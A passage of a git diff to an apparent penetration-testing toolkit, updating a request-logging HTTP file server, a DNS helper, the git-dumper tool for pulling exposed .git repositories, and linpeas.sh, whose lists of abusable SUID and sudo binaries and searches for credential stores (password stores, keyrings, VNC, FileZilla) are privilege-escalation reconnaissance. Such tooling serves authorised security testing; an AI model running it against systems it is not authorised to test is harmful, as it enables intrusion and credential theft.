diff --git a/chisel b/chisel index 575ff87..8e4acd9 100755 Binary files a/chisel and b/chisel differ diff --git a/dnsserver.py b/dnsserver.py index 0e6e819..c325bf6 100644 --- a/dnsserver.py +++ b/dnsserver.py @@ -81,6 +81,7 @@ class DnsServer: self.debug = False self.ttl = 60 * 5 self.logging = False + self.not_found_handler = None def addEntry(self, type, domain, value): if type not in self.entries: @@ -135,6 +136,8 @@ class DnsServer: reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=self.ttl, rdata=entry)) if self.logging: print(f"Request: {qt} {qn} -> {entry}") + elif self.not_found_handler: + self.not_found_handler(request, reply) if self.debug: print("DNS RESPONSE:", reply) diff --git a/fileserver.py b/fileserver.py index 06c2415..dda06b1 100755 --- a/fileserver.py +++ b/fileserver.py @@ -68,59 +68,61 @@ class FileServerRequestHandler(BaseHTTPRequestHandler): self.do_GET() def do_GET(self): + try: + if not self.server.is_running: + self.send_response(200) + self.end_headers() + return + + path = self.server.cleanPath(self.path) + route = self.find_route(path) + result = route(self) + + blacklist_headers = ["transfer-encoding", "content-length", "content-encoding", "allow", "connection"] + status_code = 200 if len(result) < 1 else result[0] + data = b"" if len(result) < 2 else result[1] + headers = { } if len(result) < 3 else result[2] + + if path in self.server.dumpRequests: + headers["Access-Control-Allow-Origin"] = "*" + + headers["Content-Length"] = len(data) + + if len(headers) == 0: + self.send_response(status_code) + else: + if path != "/dummy": + self.log_request(status_code) + self.send_response_only(status_code) + + for key, value in headers.items(): + if key.lower() not in blacklist_headers: + self.send_header(key, value) + + if self.command.upper() == "OPTIONS": + self.send_header("Allow", "OPTIONS, GET, HEAD, POST") - if not self.server.is_running: - self.send_response(200) self.end_headers() - return - path = self.server.cleanPath(self.path) - route = self.find_route(path) - result = route(self) + if data and self.command.upper() not in ["HEAD","OPTIONS"]: + self.wfile.write(data) - blacklist_headers = ["transfer-encoding", "content-length", "content-encoding", "allow", "connection"] - status_code = 200 if len(result) < 1 else result[0] - data = b"" if len(result) < 2 else result[1] - headers = { } if len(result) < 3 else result[2] + if (path in self.server.dumpRequests or "/" in self.server.dumpRequests) and path != "/dummy": + contentLength = self.headers.get('Content-Length') + body = None - if path in self.server.dumpRequests: - headers["Access-Control-Allow-Origin"] = "*" + if contentLength and int(contentLength) > 0: + body = self.rfile.read(int(contentLength)) - headers["Content-Length"] = len(data) - - if len(headers) == 0: - self.send_response(status_code) - else: - if path != "/dummy": - self.log_request(status_code) - self.send_response_only(status_code) - - for key, value in headers.items(): - if key.lower() not in blacklist_headers: - self.send_header(key, value) - - if self.command.upper() == "OPTIONS": - self.send_header("Allow", "OPTIONS, GET, HEAD, POST") - - self.end_headers() - - if data and self.command.upper() not in ["HEAD","OPTIONS"]: - self.wfile.write(data) - - if (path in self.server.dumpRequests or "/" in self.server.dumpRequests) and path != "/dummy": - contentLength = self.headers.get('Content-Length') - body = None - - if contentLength and int(contentLength) > 0: - body = self.rfile.read(int(contentLength)) - - print("===== Connection from:",self.client_address[0]) - print("%s %s %s" % (self.command, self.path, self.request_version)) - print(str(self.headers).strip()) - if body: - print() - print(body) - print("==========") + print("===== Connection from:",self.client_address[0]) + print("%s %s %s" % (self.command, self.path, self.request_version)) + print(str(self.headers).strip()) + if body: + print() + print(body) + print("==========") + except Exception as e: + print("Exception on handling http", str(e)) def log_message(self, format, *args): if self.server.logRequests: @@ -148,9 +150,15 @@ class HttpFileServer(HTTPServer): return path.strip() def addFile(self, name, data, mimeType=None): + + if hasattr(data, "read"): + fd = data + data = data.read() + fd.close() + if isinstance(data, str): data = data.encode("UTF-8") - + headers = { "Access-Control-Allow-Origin": "*", } @@ -160,6 +168,27 @@ class HttpFileServer(HTTPServer): # return 200 - OK and data self.addRoute(name, lambda req: (200, data, headers)) + def add_file_path(self, path, name=None): + def readfile(): + with open(path, "rb") as f: + return f.read() + + if name is None: + name = os.path.basename(path) + self.addRoute(name, lambda req: (200, readfile())) + + def load_directory(self, path, recursive=True, exclude_ext=[]): + if not os.path.isdir(path): + print("Not a directory:", path) + return + + for dp, dn, filenames in os.walk(path): + for f in filenames: + file_path = os.path.join(dp, f) + if not exclude_ext or os.path.splitext(file_path)[1] not in exclude_ext: + relative_path = file_path[len(path):] + self.add_file_path(file_path, relative_path) + def dumpRequest(self, name): self.dumpRequests.append(self.cleanPath(name)) diff --git a/git-dumper.py b/git-dumper.py index 3958534..1c41a33 100755 --- a/git-dumper.py +++ b/git-dumper.py @@ -44,6 +44,8 @@ def get_indexed_files(response): if (url.path and url.path != '.' and url.path != '..' and + url.path != './' and + url.path != '../' and not url.path.startswith('/') and not url.scheme and not url.netloc): @@ -171,15 +173,15 @@ def process_tasks(initial_tasks, worker, jobs, args=(), tasks_done=None): class DownloadWorker(Worker): ''' Download a list of files ''' - def init(self, url, directory, retry, timeout, module=None): + def init(self, url, directory, retry, timeout, follow_redirects=False, module=None): self.session = requests.Session() self.session.verify = False self.session.mount(url, requests.adapters.HTTPAdapter(max_retries=retry)) self.module = module - def do_task(self, filepath, url, directory, retry, timeout, module=None): + def do_task(self, filepath, url, directory, retry, timeout, follow_redirects=False, module=None): with closing(self.session.get('%s/%s' % (url, filepath), - allow_redirects=False, + allow_redirects=follow_redirects, stream=True, timeout=timeout, headers={"User-Agent": USER_AGENT})) as response: @@ -202,9 +204,9 @@ class DownloadWorker(Worker): class RecursiveDownloadWorker(DownloadWorker): ''' Download a directory recursively ''' - def do_task(self, filepath, url, directory, retry, timeout): + def do_task(self, filepath, url, directory, retry, timeout, follow_redirects=False): with closing(self.session.get('%s/%s' % (url, filepath), - allow_redirects=False, + allow_redirects=follow_redirects, stream=True, timeout=timeout, headers={"User-Agent": USER_AGENT})) as response: @@ -237,9 +239,9 @@ class RecursiveDownloadWorker(DownloadWorker): class FindRefsWorker(DownloadWorker): ''' Find refs/ ''' - def do_task(self, filepath, url, directory, retry, timeout, module): + def do_task(self, filepath, url, directory, retry, timeout, follow_redirects=False, module=None): response = self.session.get('%s/%s' % (url, filepath), - allow_redirects=False, + allow_redirects=follow_redirects, timeout=timeout, headers={"User-Agent": USER_AGENT}) printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code) @@ -271,11 +273,11 @@ class FindRefsWorker(DownloadWorker): class FindObjectsWorker(DownloadWorker): ''' Find objects ''' - def do_task(self, obj, url, directory, retry, timeout, module): + def do_task(self, obj, url, directory, retry, timeout, follow_redirects, module): # module = ".git" if not url.endswith("/modules") else "" filepath = '%s/objects/%s/%s' % (self.module, obj[:2], obj[2:]) response = self.session.get('%s/%s' % (url, filepath), - allow_redirects=False, + allow_redirects=follow_redirects, timeout=timeout, headers={"User-Agent": USER_AGENT}) printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code) @@ -295,7 +297,7 @@ class FindObjectsWorker(DownloadWorker): return get_referenced_sha1(obj_file) -def fetch_git(url, directory, jobs, retry, timeout, module=".git"): +def fetch_git(url, directory, jobs, retry, timeout, follow_redirects, module=".git"): ''' Dump a git repository into the output directory ''' assert os.path.isdir(directory), '%s is not a directory' % directory @@ -320,7 +322,7 @@ def fetch_git(url, directory, jobs, retry, timeout, module=".git"): # check for /.git/HEAD printf('[-] Testing %s/%s/HEAD ', url, module) - response = requests.get('%s/%s/HEAD' % (url, module), verify=False, allow_redirects=False, headers={"User-Agent": USER_AGENT}) + response = requests.get('%s/%s/HEAD' % (url, module), verify=False, allow_redirects=follow_redirects, headers={"User-Agent": USER_AGENT}) printf('[%d]\n', response.status_code) if response.status_code != 200: @@ -332,7 +334,7 @@ def fetch_git(url, directory, jobs, retry, timeout, module=".git"): # check for directory listing printf('[-] Testing %s/%s/ ', url, module) - response = requests.get('%s/%s/' % (url, module), verify=False, allow_redirects=False, headers={"User-Agent": USER_AGENT}) + response = requests.get('%s/%s/' % (url, module), verify=False, allow_redirects=follow_redirects, headers={"User-Agent": USER_AGENT}) printf('[%d]\n', response.status_code) if response.status_code == 200 and is_html(response) and 'HEAD' in get_indexed_files(response): @@ -340,7 +342,7 @@ def fetch_git(url, directory, jobs, retry, timeout, module=".git"): process_tasks(['.git/', '.gitignore'], RecursiveDownloadWorker, jobs, - args=(url, directory, retry, timeout)) + args=(url, directory, retry, timeout, follow_redirects)) printf('[-] Running git checkout .\n') os.chdir(directory) @@ -378,7 +380,7 @@ def fetch_git(url, directory, jobs, retry, timeout, module=".git"): process_tasks(tasks, DownloadWorker, jobs, - args=(url, directory, retry, timeout, module)) + args=(url, directory, retry, timeout, follow_redirects, module)) if module == ".git": modules_path = os.path.join(directory, '.gitmodules') @@ -392,7 +394,7 @@ def fetch_git(url, directory, jobs, retry, timeout, module=".git"): printf("[-] Fetching module: %s\n", module_name) # os.makedirs(os.path.abspath(module_dir)) module_url = url + "/.git/modules" - fetch_git(module_url, module_dir, jobs, retry, timeout, module=module_name) + fetch_git(module_url, module_dir, jobs, retry, timeout, follow_redirects, module=module_name) printf("[+] Done iterating module\n") # find refs @@ -420,7 +422,7 @@ def fetch_git(url, directory, jobs, retry, timeout, module=".git"): process_tasks(tasks, FindRefsWorker, jobs, - args=(url, directory, retry, timeout, module)) + args=(url, directory, retry, timeout, follow_redirects, module)) # find packs printf('[-] Finding packs\n') @@ -439,7 +441,7 @@ def fetch_git(url, directory, jobs, retry, timeout, module=".git"): process_tasks(tasks, DownloadWorker, jobs, - args=(url, directory, retry, timeout)) + args=(url, directory, retry, timeout, follow_redirects)) # find objects printf('[-] Finding objects\n') @@ -477,8 +479,12 @@ def fetch_git(url, directory, jobs, retry, timeout, module=".git"): if os.path.exists(index_path): index = dulwich.index.Index(index_path) - for entry in index.iterblobs(): - objs.add(entry[1].decode()) + # index.iteritems() + for entry in index.iteritems(): + if isinstance(entry[1], dulwich.index.IndexEntry): + objs.add(entry[1].sha.decode()) + elif hasattr(entry[1], "decode"): + objs.add(entry[1].decode()) # use packs to find more objects to fetch, and objects that are packed pack_file_dir = os.path.join(directory, module, 'objects', 'pack') @@ -500,7 +506,7 @@ def fetch_git(url, directory, jobs, retry, timeout, module=".git"): process_tasks(objs, FindObjectsWorker, jobs, - args=(url, directory, retry, timeout, module), + args=(url, directory, retry, timeout, follow_redirects, module), tasks_done=packed_objs) # git checkout @@ -529,6 +535,9 @@ if __name__ == '__main__': help='number of request attempts before giving up') parser.add_argument('-t', '--timeout', type=int, default=3, help='maximum time in seconds before giving up') + parser.add_argument('-L', '--follow-redirects', default=False, + dest='follow_redirects', action="store_true", + help='follow redirects') args = parser.parse_args() # jobs @@ -576,7 +585,7 @@ if __name__ == '__main__': # fetch everything path = os.path.realpath(args.directory) - code = fetch_git(args.url, args.directory, args.jobs, args.retry, args.timeout) + code = fetch_git(args.url, args.directory, args.jobs, args.retry, args.timeout, args.follow_redirects) if not os.listdir(path): os.rmdir(path) diff --git a/linpeas.sh b/linpeas.sh index 2888d38..2b353d2 100644 --- a/linpeas.sh +++ b/linpeas.sh @@ -365,12 +365,12 @@ sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" #To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' -sidVB='/ab$|/agetty$|/ar$|/aria2c$|/arj$|/arp$|/as$|/ascii-xfr$|/ash$|/aspell$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/efax$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/genisoimage$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/ispell$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/lftp$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$' -sidVB2='/msgmerge$|/msguniq$|/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nm$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/ptx$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/sash$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/sshpass$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' +sidVB='/ab$|/agetty$|/ar$|/aria2c$|/arj$|/arp$|/as$|/ascii-xfr$|/ash$|/aspell$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/efax$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/fish$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/genisoimage$|/gimp$|/ginsh$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/ispell$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/lftp$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$' +sidVB2='/msgfilter$|/msgmerge$|/msguniq$|/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nm$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/psftp$|/ptx$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/sash$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/sshpass$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' cfuncs='file|free|main|more|read|split|write' -sudoVB1=" \*|env_keep\+=LD_PRELOAD|ab$|ansible-playbook$|apt-get$|apt$|ar$|aria2c$|arj$|arp$|as$|ascii-xfr$|ascii85$|ash$|aspell$|at$|atobm$|awk$|base32$|base64$|basenc$|bash$|bpftrace$|bridge$|bundler$|busctl$|busybox$|byebug$|bzip2$|c89$|c99$|capsh$|cat$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|chown$|chroot$|cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|csh$|csplit$|csvtool$|cupsfilter$|curl$|cut$|dash$|date$|dd$|dialog$|diff$|dig$|dmesg$|dmidecode$|dmsetup$|dnf$|docker$|dosbox$|dpkg$|dvips$|easy_install$|eb$|ed$|efax$|emacs$|env$|eqn$|ex$|exiftool$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gawk$|gcc$|gcore$|gdb$|gem$|genisoimage$|ghc$|ghci$|gimp$|git$|grc$|grep$|gtester$|gzip$|hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|ip$|irb$|ispell$|jjs$|join$|journalctl$|jq$|jrunscript$|knife$|ksh$|ksshell$|latex$|ldconfig$|less$|lftp$|ln$|loginctl$|logsave$|look$|ltrace$|lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|man$|mawk$|more$" -sudoVB2="mount$|msgattrib$|msgcat$|msgconv$|msgfilter$|msgmerge$|msguniq$|mtr$|mv$|mysql$|nano$|nasm$|nawk$|nc$|neofetch$|nice$|nl$|nm$|nmap$|node$|nohup$|npm$|nroff$|nsenter$|octave$|od$|openssl$|openvpn$|openvt$|paste$|pdb$|pdflatex$|pdftex$|perf$|perl$|pg$|php$|pic$|pico$|pip$|pkexec$|pkg$|pr$|pry$|psql$|ptx$|puppet$|python$|rake$|readelf$|red$|redcarpet$|restic$|rev$|rlwrap$|rpm$|rpmquery$|rsync$|ruby$|run-mailcap$|run-parts$|rview$|rvim$|sash$|scp$|screen$|script$|sed$|service$|setarch$|sftp$|sg$|shuf$|slsh$|smbclient$|snap$|socat$|soelim$|sort$|split$|sqlite3$|ss$|ssh-keygen$|ssh-keyscan$|ssh$|sshpass$|start-stop-daemon$|stdbuf$|strace$|strings$|su$|sysctl$|systemctl$|systemd-resolve$|tac$|tail$|tar$|taskset$|tbl$|tclsh$|tcpdump$|tee$|telnet$|tex$|tftp$|tic$|time$|timedatectl$|timeout$|tmux$|top$|troff$|ul$|unexpand$|uniq$|unshare$|update-alternatives$|uudecode$|uuencode$|valgrind$|vi$|view$|vigr$|vim$|vimdiff$|vipw$|virsh$|wall$|watch$|wc$|wget$|whiptail$|wireshark$|wish$|xargs$|xelatex$|xetex$|xmodmap$|xmore$|xxd$|xz$|yarn$|yum$|zip$|zsh$|zsoelim$|zypper$" +sudoVB1=" \*|env_keep\+=LD_PRELOAD|ab$|ansible-playbook$|apt-get$|apt$|ar$|aria2c$|arj$|arp$|as$|ascii-xfr$|ascii85$|ash$|aspell$|at$|atobm$|awk$|base32$|base64$|basenc$|bash$|bpftrace$|bridge$|bundler$|busctl$|busybox$|byebug$|bzip2$|c89$|c99$|capsh$|cat$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|chown$|chroot$|cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|csh$|csplit$|csvtool$|cupsfilter$|curl$|cut$|dash$|date$|dd$|dialog$|diff$|dig$|dmesg$|dmidecode$|dmsetup$|dnf$|docker$|dosbox$|dpkg$|dvips$|easy_install$|eb$|ed$|efax$|emacs$|env$|eqn$|ex$|exiftool$|expand$|expect$|facter$|file$|find$|fish$|flock$|fmt$|fold$|ftp$|gawk$|gcc$|gcore$|gdb$|gem$|genisoimage$|ghc$|ghci$|gimp$|ginsh$|git$|grc$|grep$|gtester$|gzip$|hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|ip$|irb$|ispell$|jjs$|join$|journalctl$|jq$|jrunscript$|knife$|ksh$|ksshell$|latex$|ldconfig$|less$|lftp$|ln$|loginctl$|logsave$|look$|ltrace$|lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|man$|mawk$|more$" +sudoVB2="mount$|msgattrib$|msgcat$|msgconv$|msgfilter$|msgmerge$|msguniq$|mtr$|mv$|mysql$|nano$|nasm$|nawk$|nc$|neofetch$|nice$|nl$|nm$|nmap$|node$|nohup$|npm$|nroff$|nsenter$|octave$|od$|openssl$|openvpn$|openvt$|paste$|pdb$|pdflatex$|pdftex$|perf$|perl$|pg$|php$|pic$|pico$|pip$|pkexec$|pkg$|pr$|pry$|psftp$|psql$|ptx$|puppet$|python$|rake$|readelf$|red$|redcarpet$|restic$|rev$|rlwrap$|rpm$|rpmquery$|rsync$|ruby$|run-mailcap$|run-parts$|rview$|rvim$|sash$|scp$|screen$|script$|sed$|service$|setarch$|sftp$|sg$|shuf$|slsh$|smbclient$|snap$|socat$|soelim$|sort$|split$|sqlite3$|ss$|ssh-keygen$|ssh-keyscan$|ssh$|sshpass$|start-stop-daemon$|stdbuf$|strace$|strings$|su$|sysctl$|systemctl$|systemd-resolve$|tac$|tail$|tar$|taskset$|tbl$|tclsh$|tcpdump$|tee$|telnet$|tex$|tftp$|tic$|time$|timedatectl$|timeout$|tmux$|top$|troff$|ul$|unexpand$|uniq$|unshare$|update-alternatives$|uudecode$|uuencode$|valgrind$|vi$|view$|vigr$|vim$|vimdiff$|vipw$|virsh$|wall$|watch$|wc$|wget$|whiptail$|wireshark$|wish$|xargs$|xelatex$|xetex$|xmodmap$|xmore$|xpad$|xxd$|xz$|yarn$|yum$|zip$|zsh$|zsoelim$|zypper$" sudoB="$(whoami)|ALL:ALL|ALL : ALL|ALL|NOPASSWD|SETENV|/apache2|/cryptsetup|/mount" sudoG="NOEXEC" @@ -985,153 +985,153 @@ if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | gre CONT_THREADS=0 # FIND ALL KNOWN INTERESTING SOFTWARE FILES - FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"bind\" -o -name \"sentry\" -o -name \"pam.d\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"system.d\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"system-connections\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"postfix\" -o -name \"mysql\" -o -name \"keyrings\" -o -name \"environments\" -o -name \"logstash\" -o -name \".bluemix\" -o -name \"roundcube\" -o -name \".password-store\" -o -name \"ldap\" -o -name \".irssi\" -o -name \"seeddms*\" -o -name \"filezilla\" -o -name \".cloudflared\" -o -name \"sentry\" -o -name \".vnc\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"sites-enabled\" -o -name \"couchdb\" -o -name \"cacti\" -o -name \"neo4j\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - 